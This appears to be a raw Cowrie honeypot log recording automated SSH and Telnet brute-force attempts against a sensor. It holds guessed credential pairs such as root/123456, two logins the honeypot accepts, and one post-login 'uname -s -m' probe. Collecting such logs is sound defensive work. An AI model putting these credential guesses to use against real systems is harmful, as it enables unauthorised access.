{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40561,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fc25e6430fc","protocol":"telnet","message":"New connection: 212.227.235.229:40561 (1.2.3.4:23) [session: 9fc25e6430fc]","sensor":"my-vps","timestamp":"2025-08-28T09:57:27.388206Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34908,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a9c4481e4a0","protocol":"ssh","message":"New connection: 51.79.164.132:34908 (1.2.3.4:22) [session: 1a9c4481e4a0]","sensor":"my-vps","timestamp":"2025-08-28T09:57:35.538590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:57:35.785210Z","src_ip":"51.79.164.132","session":"1a9c4481e4a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:57:35.785917Z","src_ip":"51.79.164.132","session":"1a9c4481e4a0"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-28T09:57:37.621559Z","src_ip":"51.79.164.132","session":"1a9c4481e4a0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:39.079709Z","src_ip":"51.79.164.132","session":"1a9c4481e4a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60268,"dst_ip":"1.2.3.4","dst_port":22,"session":"f11d382cbdd9","protocol":"ssh","message":"New connection: 212.227.125.160:60268 (1.2.3.4:22) [session: f11d382cbdd9]","sensor":"my-vps","timestamp":"2025-08-28T09:57:44.376395Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:45.253940Z","src_ip":"212.227.125.160","session":"f11d382cbdd9"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":36706,"dst_ip":"1.2.3.4","dst_port":22,"session":"c784a1257942","protocol":"ssh","message":"New connection: 185.93.89.7:36706 (1.2.3.4:22) [session: c784a1257942]","sensor":"my-vps","timestamp":"2025-08-28T09:57:49.915443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:57:49.931936Z","src_ip":"185.93.89.7","session":"c784a1257942"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:57:49.959371Z","src_ip":"185.93.89.7","session":"c784a1257942"}
{"eventid":"cowrie.login.failed","username":"index","password":"12121212","message":"login attempt [index/12121212] failed","sensor":"my-vps","timestamp":"2025-08-28T09:57:50.254068Z","src_ip":"185.93.89.7","session":"c784a1257942"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:57:51.302857Z","src_ip":"185.93.89.7","session":"c784a1257942"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37274,"dst_ip":"1.2.3.4","dst_port":22,"session":"a57ff5aabbc1","protocol":"ssh","message":"New connection: 212.227.125.160:37274 (1.2.3.4:22) [session: a57ff5aabbc1]","sensor":"my-vps","timestamp":"2025-08-28T09:57:56.461654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:57:56.462555Z","src_ip":"212.227.125.160","session":"a57ff5aabbc1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:57:56.677782Z","src_ip":"212.227.125.160","session":"a57ff5aabbc1"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:57:59.662101Z","src_ip":"212.227.125.160","session":"a57ff5aabbc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56288,"dst_ip":"1.2.3.4","dst_port":22,"session":"627964687829","protocol":"ssh","message":"New connection: 212.227.125.160:56288 (1.2.3.4:22) [session: 627964687829]","sensor":"my-vps","timestamp":"2025-08-28T09:58:01.093018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:01.106522Z","src_ip":"212.227.125.160","session":"627964687829"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:58:01.303630Z","src_ip":"212.227.125.160","session":"627964687829"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":41856,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c8ae9377f9d","protocol":"ssh","message":"New connection: 51.79.164.132:41856 (1.2.3.4:22) [session: 5c8ae9377f9d]","sensor":"my-vps","timestamp":"2025-08-28T09:58:01.306578Z"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:01.383744Z","src_ip":"212.227.125.160","session":"a57ff5aabbc1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:01.389517Z","src_ip":"51.79.164.132","session":"5c8ae9377f9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:58:02.023524Z","src_ip":"51.79.164.132","session":"5c8ae9377f9d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:58:02.735931Z","src_ip":"212.227.125.160","session":"627964687829"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:03.950406Z","src_ip":"212.227.125.160","session":"627964687829"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T09:58:04.021811Z","src_ip":"51.79.164.132","session":"5c8ae9377f9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56294,"dst_ip":"1.2.3.4","dst_port":22,"session":"920b3cdf320d","protocol":"ssh","message":"New connection: 212.227.125.160:56294 (1.2.3.4:22) [session: 920b3cdf320d]","sensor":"my-vps","timestamp":"2025-08-28T09:58:04.159561Z"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":56058,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba8d8dfd35e4","protocol":"ssh","message":"New connection: 116.198.207.211:56058 (1.2.3.4:22) [session: ba8d8dfd35e4]","sensor":"my-vps","timestamp":"2025-08-28T09:58:05.037580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:05.038590Z","src_ip":"116.198.207.211","session":"ba8d8dfd35e4"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:05.215235Z","src_ip":"51.79.164.132","session":"5c8ae9377f9d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:58:05.232239Z","src_ip":"116.198.207.211","session":"ba8d8dfd35e4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:06.830830Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:58:06.831533Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:58:09.089718Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:58:09.529694Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T09:58:09.530512Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:09.746518Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:09.748098Z","src_ip":"212.227.125.160","session":"920b3cdf320d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:13.038561Z","src_ip":"116.198.207.211","session":"ba8d8dfd35e4"}
{"eventid":"cowrie.session.closed","duration":45.842368841171265,"message":"Connection lost after 45 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:13.230502Z","src_ip":"212.227.235.229","session":"9fc25e6430fc"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51768,"dst_ip":"1.2.3.4","dst_port":22,"session":"98adea4849a4","protocol":"ssh","message":"New connection: 185.93.89.7:51768 (1.2.3.4:22) [session: 98adea4849a4]","sensor":"my-vps","timestamp":"2025-08-28T09:58:14.439784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:14.486447Z","src_ip":"185.93.89.7","session":"98adea4849a4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:58:14.487458Z","src_ip":"185.93.89.7","session":"98adea4849a4"}
{"eventid":"cowrie.login.failed","username":"index","password":"212121","message":"login attempt [index/212121] failed","sensor":"my-vps","timestamp":"2025-08-28T09:58:14.620343Z","src_ip":"185.93.89.7","session":"98adea4849a4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:58:15.755187Z","src_ip":"185.93.89.7","session":"98adea4849a4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59978,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc399b283aa0","protocol":"ssh","message":"New connection: 51.79.164.132:59978 (1.2.3.4:22) [session: cc399b283aa0]","sensor":"my-vps","timestamp":"2025-08-28T09:58:27.403159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:58:27.928105Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:58:27.928837Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:58:31.831029Z","src_ip":"51.79.164.132","session":"cc399b283aa0"}
